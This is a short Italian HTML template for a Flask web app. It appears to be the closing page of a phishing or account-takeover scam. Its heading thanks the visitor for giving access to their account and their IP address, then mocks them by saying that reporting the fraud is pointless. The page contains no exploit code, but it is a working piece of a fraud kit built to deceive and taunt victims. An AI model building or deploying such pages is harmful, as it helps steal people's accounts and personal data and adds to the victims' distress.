<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Accesso completato</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <img src="{{ url_for('static', filename='ok.png') }}" class="ok-img">
    <h1 class="riv">Ti ringraziamo per averci permesso di accedere al tuo conto e averci fatto avere il tuo ip. Alla prossima... denuncia per truffa... inutile!</h1>
</body>
</html>